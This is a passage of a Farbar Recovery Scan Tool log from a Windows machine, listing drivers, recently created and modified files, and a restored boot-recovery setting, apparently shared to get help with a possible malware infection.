S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [12504 2013-09-30] (MiniTool Solution Ltd -> )
R3 SbieDrv; C:\Program Files\Sandboxie\SbieDrv.sys [228616 2019-04-23] (Invincea, Inc. -> Sandboxie Holdings, LLC)
R3 ScpVBus; C:\Windows\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
R3 teVirtualMIDI64; C:\Windows\system32\DRIVERS\teVirtualMIDI64.sys [41016 2015-07-12] (Tobias Erichsen -> Tobias Erichsen)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2016-12-21] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
R1 veracrypt; C:\Windows\System32\drivers\veracrypt.sys [631200 2018-01-16] (IDRIX -> IDRIX)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [46472 2019-10-29] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [351968 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [53984 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2017-06-03] (Zemana Ltd. -> Zemana Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-26 13:22 - 2019-11-26 13:22 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\16251371.sys
2019-11-26 13:21 - 2019-11-26 13:49 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2019-11-26 13:21 - 2019-11-26 13:38 - 000000000 ____D C:\Users\SR\Desktop\mbar
2019-11-25 12:54 - 2019-11-25 12:54 - 009089848 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-11-25 12:54 - 2019-11-25 12:54 - 001456720 _____ (Microsoft Corporation) C:\Windows\system32\osloader.efi
2019-11-25 01:38 - 2019-11-26 13:39 - 000278344 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-11-25 01:38 - 2019-11-25 01:38 - 000216544 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2019-11-25 00:08 - 2019-11-25 11:33 - 000000872 _____ C:\Users\Public\Desktop\REAPER (x64).lnk
2019-11-25 00:08 - 2019-11-25 11:33 - 000000872 _____ C:\ProgramData\Desktop\REAPER (x64).lnk
2019-11-25 00:08 - 2019-11-25 00:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\REAPER (x64)
2019-11-24 20:00 - 2019-11-24 20:00 - 000081073 _____ C:\Users\SR\Desktop\Addition.txt
2019-11-24 20:00 - 2019-11-24 20:00 - 000060028 _____ C:\Users\SR\Desktop\FRST.txt
2019-11-24 19:50 - 2019-11-26 14:03 - 000000000 ____D C:\FRST
2019-11-24 18:57 - 2019-11-26 13:39 - 000000000 ___HD C:\Windows\rss
2019-11-24 00:05 - 2019-11-24 00:05 - 000000000 ____D C:\Users\SR\Documents\Joshua Bell Violin
2019-11-23 23:48 - 2019-11-24 00:35 - 000011305 _____ C:\Users\SR\Desktop\Named Notes for various VIs.xlsx
2019-11-23 22:00 - 2019-11-24 18:58 - 000009127 _____ C:\Users\SR\Desktop\New Microsoft Excel Worksheet.xlsx
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Users\SR\AppData\Roaming\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Exponential Audio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\AudioUTOPiA
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Program Files\Common Files\vst3
2019-11-19 23:08 - 2019-11-19 23:09 - 000000000 ____D C:\Users\SR\Desktop\New folder
2019-11-19 21:06 - 2019-11-19 18:40 - 000514360 _____ C:\Users\SR\Desktop\Spitfire Solo Cello.nicnt
2019-11-19 18:32 - 2019-11-19 18:32 - 000000040 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkc
2019-11-19 17:50 - 2019-11-19 17:50 - 000000000 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkx
2019-11-18 13:04 - 2019-11-18 13:04 - 000001289 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FolderSize.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\Users\Public\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\ProgramData\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000000000 __HDC C:\ProgramData\{06D838A8-9544-4D7D-808F-4ED187621BBB}
2019-11-17 22:49 - 2019-11-17 23:42 - 000000000 ____D C:\Users\SR\Desktop\old Native Instruments folder
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\Users\Public\Documents\NI Resources
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\ProgramData\Documents\NI Resources
2019-11-16 00:54 - 2019-11-16 00:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2019-11-14 14:19 - 2019-11-14 14:19 - 000051024 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\AppData\Roaming\Subversion
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\.android
2019-11-11 14:04 - 2019-11-11 14:04 - 000000000 ____D C:\Users\SR\Documents\Embarcadero
2019-11-11 13:49 - 2019-11-11 13:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Embarcadero InterBase XE7
2019-11-11 13:49 - 2016-02-25 19:35 - 001287496 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\gds32.dll
2019-11-11 13:49 - 2016-02-25 19:35 - 000031560 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\ibxml.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 001766728 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibclient64.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 000034632 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibxml64.dll
2019-11-11 13:48 - 2019-11-11 13:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\Users\Public\Documents\Embarcadero
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\ProgramData\Documents\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\Users\SR\AppData\Roaming\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\ProgramData\Embarcadero
2019-11-11 00:57 - 2019-11-11 00:57 - 000000000 ____D C:\Users\SR\AppData\Local\PackageAware
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\wxWidgets-3.0.4
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\wxWidgets 3.0.4
2019-11-10 22:32 - 2019-11-10 23:12 - 000000000 ____D C:\Users\SR\Documents\srCodeBlock
2019-11-10 22:27 - 2019-11-11 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks
2019-11-10 22:27 - 2019-11-10 23:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\CodeBlocks
2019-11-10 20:56 - 2019-11-10 20:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2017 Tools for Unity
2019-11-10 20:55 - 2019-11-10 20:55 - 000000000 ____D C:\Program Files (x86)\Windows Phone Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Windows App Certification Kit
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files\Application Verifier
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files (x86)\Application Verifier
2019-11-10 20:40 - 2018-04-11 06:46 - 000402944 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 06:44 - 000350208 _____ (Microsoft Corporation) C:\Windows\system32\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-11 05:12 - 000380416 _____ (Windows ® Win 7 DDK provider) C:\Windows\SysWOW64\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 05:11 - 000271360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-10 21:41 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:37 - 000095744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 017871360 _____ (Microsoft Corporation) C:\Windows\system32\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 014058496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000041984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000142336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000238592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 004529664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 003632640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 002249728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 001100288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000466944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000334848 _____ (Microsoft Corporation) C:\Windows\system32\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 001359872 _____ (Microsoft Corporation) C:\Windows\system32\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsExperiment.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000176128 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 004858880 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 001500160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000921088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 000539136 _____ (Microsoft Corporation) C:\Windows\system32\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 005746688 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:05 - 002000896 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 000164864 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:04 - 000189952 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:03 - 002818560 _____ (Microsoft Corporation) C:\Windows\system32\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:02 - 001178624 _____ (Microsoft Corporation) C:\Windows\system32\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:02 - 000286720 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsExperiment.dll
2019-11-10 20:36 - 2019-11-10 20:36 - 000000000 ____D C:\Program Files (x86)\NuGet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Users\SR\.dotnet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Program Files\dotnet
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1028
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1028
2019-11-10 20:34 - 2019-11-10 20:34 - 000001843 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blend for Visual Studio 2017.lnk
2019-11-10 20:34 - 2019-11-10 20:34 - 000000000 ____D C:\Program Files (x86)\Entity Framework Tools
2019-11-10 20:33 - 2019-11-10 20:33 - 000001499 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017.lnk
2019-11-05 18:52 - 2019-11-05 18:52 - 000000000 ____D C:\Users\SR\AppData\Local\Viber
2019-10-28 22:34 - 2019-10-28 22:34 - 000000000 ____D C:\Users\SR\Desktop\FIFA-19---Career-Mode-Cheat-Table-master

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-26 14:02 - 2019-08-14 11:29 - 000039823 _____ C:\Windows\ZAM_Guard.krnl.trace
2019-11-26 14:02 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-11-26 13:53 - 2018-06-02 15:28 - 001464880 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-26 13:53 - 2018-06-02 13:32 - 000550540 _____ C:\Windows\system32\perfh008.dat
2019-11-26 13:53 - 2018-06-02 13:32 - 000088248 _____ C:\Windows\system32\perfc008.dat
2019-11-26 13:53 - 2018-04-12 01:36 - 000000000 ____D C:\Windows\INF
2019-11-26 13:51 - 2018-06-01 16:16 - 000000000 ____D C:\ProgramData\NVIDIA
2019-11-26 13:51 - 2017-05-25 17:31 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Mozilla
2019-11-26 13:50 - 2017-10-10 18:36 - 000000000 ____D C:\Users\SR\Documents\DesktopReminder
2019-11-26 13:49 - 2018-06-06 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2019-11-26 13:49 - 2018-06-02 15:24 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-26 13:49 - 2018-06-02 15:16 - 000000000 ____D C:\Windows\system32\SleepStudy
2019-11-26 13:49 - 2017-06-15 17:44 - 000000000 ____D C:\ProgramData\Reprise
2019-11-26 13:38 - 2017-05-26 14:22 - 000000000 ____D C:\Users\SR\AppData\Local\CrashDumps
2019-11-26 13:23 - 2017-05-25 19:29 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-11-26 09:49 - 2018-10-19 19:31 - 000000000 ____D C:\Windows\Minidump
2019-11-25 23:47 - 2017-11-04 13:39 - 000011564 _____ C:\Windows\system32\DVCState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-25 23:47 - 2017-11-04 13:39 - 000001164 _____ C:\Windows\system32\BMXCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-25 23:47 - 2017-11-04 13:39 - 000001164 _____ C:\Windows\system32\BMXBkpCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-25 23:47 - 2017-11-04 13:39 - 000000072 _____ C:\Windows\system32\BMXStateBkp-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-25 23:47 - 2017-11-04 13:39 - 000000072 _____ C:\Windows\system32\BMXState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-25 21:21 - 2018-06-02 15:19 - 000000000 ____D C:\Users\SR
2019-11-25 21:21 - 2018-04-11 23:04 - 000524288 _____ C:\Windows\system32\config\BBI
2019-11-25 13:29 - 2017-09-08 20:54 - 000000000 ____D C:\Users\SR\Documents\REAPER Media
2019-11-25 13:29 - 2017-05-26 16:39 - 000000000 ____D C:\Users\SR\AppData\Roaming\REAPER
2019-11-25 13:23 - 2018-06-02 15:24 - 000003374 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3967059023-4107875624-2872843465-1001
2019-11-25 13:23 - 2018-06-02 15:19 - 000002403 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-11-25 13:23 - 2017-05-25 17:10 - 000000000 ___RD C:\Users\SR\OneDrive
2019-11-25 11:33 - 2017-05-26 16:40 - 000000000 ____D C:\Program Files\REAPER (x64)
2019-11-25 01:38 - 2019-08-11 17:31 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-11-25 01:38 - 2019-08-11 17:31 - 000020936 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
2019-11-25 01:38 - 2019-08-11 17:31 - 000002024 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-11-25 01:38 - 2019-08-11 17:31 - 000002024 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2019-11-25 01:38 - 2017-11-23 11:26 - 000000000 ____D C:\Users\SR\AppData\Local\cache
2019-11-25 01:33 - 2017-08-27 21:09 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Temp
2019-11-25 01:28 - 2018-06-02 15:24 - 000000000 ____D C:\Windows\system32\Tasks\JumpingBytes
2019-11-24 18:57 - 2017-06-12 13:15 - 000011914 __RSH C:\ProgramData\ntuser.pol
2019-11-24 18:37 - 2017-05-26 12:04 - 000000000 ____D C:\Users\SR\AppData\Roaming\qBittorrent
2019-11-24 10:51 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\AppReadiness
2019-11-23 18:35 - 2018-04-12 01:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-11-22 21:41 - 2017-05-26 15:08 - 000002096 _____ C:\Windows\Sandboxie.ini
2019-11-21 20:12 - 2019-02-18 21:23 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-11-21 19:49 - 2017-05-26 16:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments
2019-11-21 17:13 - 2019-07-15 15:01 - 000000000 ____D C:\Users\SR\AppData\Roaming\ViberPC
2019-11-21 01:11 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\LiveKernelReports
2019-11-19 23:10 - 2017-05-26 16:56 - 000000000 ____D C:\Program Files\Native Instruments
2019-11-19 11:34 - 2019-03-02 14:15 - 000634880 _____ C:\Users\SR\Documents\MeNew_v2.fmp12
2019-11-18 15:43 - 2019-10-19 15:18 - 000018960 _____ (Logitech, Inc.) C:\Windows\system32\Drivers\LNonPnP.sys
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2019-11-17 21:04 - 2017-09-08 20:57 - 000027684 _____ C:\Users\SR\Desktop\sc3.tmp
2019-11-17 15:25 - 2017-05-26 12:41 - 000000000 ____D C:\Users\SR\Documents\Camtasia Studio
2019-11-17 13:17 - 2018-01-16 19:24 - 000000000 ____D C:\Users\SR\AppData\Roaming\vlc
2019-11-16 00:54 - 2018-01-03 12:14 - 000000000 ____D C:\Program Files (x86)\Dropbox
2019-11-16 00:19 - 2018-11-26 20:34 - 000006144 _____ C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-11-14 19:23 - 2017-09-08 22:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\Mp3tag
2019-11-14 12:13 - 2018-04-12 15:16 - 000000000 ____D C:\Users\SR\AppData\Local\PlaceholderTileLogoFolder
2019-11-13 15:13 - 2018-02-14 15:35 - 000000000 ____D C:\Users\SR\AppData\Local\Packages
2019-11-13 13:02 - 2017-05-25 19:45 - 000748816 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2019-11-12 12:45 - 2018-06-02 15:16 - 005163280 _____ C:\Windows\system32\FNTCACHE.DAT
2019-11-11 17:40 - 2018-01-03 12:23 - 000000000 ___RD C:\Users\SR\Dropbox
2019-11-11 15:38 - 2017-08-27 19:44 - 000000000 ____D C:\Users\SR\AppData\Roaming\Visual Studio Setup
2019-11-11 13:49 - 2015-07-10 13:04 - 000017535 _____ C:\Windows\system32\Drivers\etc\services
2019-11-11 13:48 - 2017-09-07 13:40 - 000000000 ____D C:\Users\SR\.oracle_jre_usage
2019-11-11 13:48 - 2017-05-26 16:29 - 000000000 ____D C:\Program Files\Java
2019-11-11 13:48 - 2017-05-25 21:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2019-11-10 20:52 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Microsoft SDKs
2019-11-10 20:48 - 2017-06-30 19:12 - 000000000 ____D C:\ProgramData\Package Cache
2019-11-10 20:46 - 2018-04-12 01:30 - 000000000 ____D C:\Windows\CbsTemp
2019-11-10 20:34 - 2017-08-27 19:44 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2019-11-10 20:34 - 2017-06-11 17:39 - 000000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2019-11-10 20:33 - 2018-06-02 13:14 - 000000000 ____D C:\Program Files (x86)\MSBuild
2019-11-10 20:33 - 2018-04-12 01:38 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2019-11-10 20:33 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Windows Kits
2019-11-10 16:31 - 2019-01-08 14:50 - 000000000 ____D C:\Users\SR\AppData\Roaming\temp_info_collect
2019-11-10 16:30 - 2019-01-08 14:50 - 000000000 ____D C:\ProgramData\EMM
2019-11-09 19:38 - 2017-08-27 20:07 - 000000000 ____D C:\Users\SR\Documents\Visual Studio 2017
2019-11-09 19:32 - 2017-08-27 19:44 - 000001402 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2019-11-08 14:06 - 2019-10-09 15:00 - 000000000 ____D C:\Users\SR\Desktop\Unused Mods
2019-11-08 12:53 - 2017-05-27 13:55 - 000000000 ____D C:\Users\SR\Documents\Flight Simulator X Files
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files\Mozilla Firefox
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-03 13:05 - 2017-11-15 14:46 - 000001275 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IconShepherd
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\Program Files\IconShepherd
2019-10-29 10:07 - 2018-03-01 10:19 - 000000000 ____D C:\Windows\system32\Drivers\wd
2019-10-28 22:32 - 2018-12-02 22:13 - 000000000 ____D C:\Users\SR\Documents\FIFA 19

==================== Files in the root of some directories ========

2019-08-11 17:16 - 2019-08-11 17:16 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2019-08-11 17:16 - 2019-08-11 17:16 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2017-06-18 13:13 - 2019-10-20 14:44 - 000000132 ____H () C:\Users\SR\AppData\Roaming\Adobe PNG Format CC Prefs
2017-05-27 13:13 - 2017-05-27 13:13 - 000001167 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.1.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000905 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000000 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2019-06-01 18:59 - 2019-10-20 14:40 - 000001456 _____ () C:\Users\SR\AppData\Local\Adobe Save for Web 13.0 Prefs
2018-11-26 20:34 - 2019-11-16 00:19 - 000006144 _____ () C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-09-27 17:57 - 2018-09-27 17:57 - 000000000 _____ () C:\Users\SR\AppData\Local\oobelibMkey.log
2017-06-05 14:13 - 2017-07-14 23:32 - 000007598 _____ () C:\Users\SR\AppData\Local\Resmon.ResmonCfg
2018-03-01 13:55 - 2019-07-25 12:32 - 000001207 _____ () C:\Users\SR\AppData\Local\SuperJolt.Common.log
2018-03-01 13:55 - 2019-07-25 12:32 - 000002529 _____ () C:\Users\SR\AppData\Local\SuperJolt.Snapper.log
2017-06-10 15:40 - 2017-06-12 13:14 - 000930816 _____ () C:\Users\SR\AppData\Local\test_db_cara.db

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully
==================== End of FRST.txt ========================

 

 

 

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 25-11-2019 01
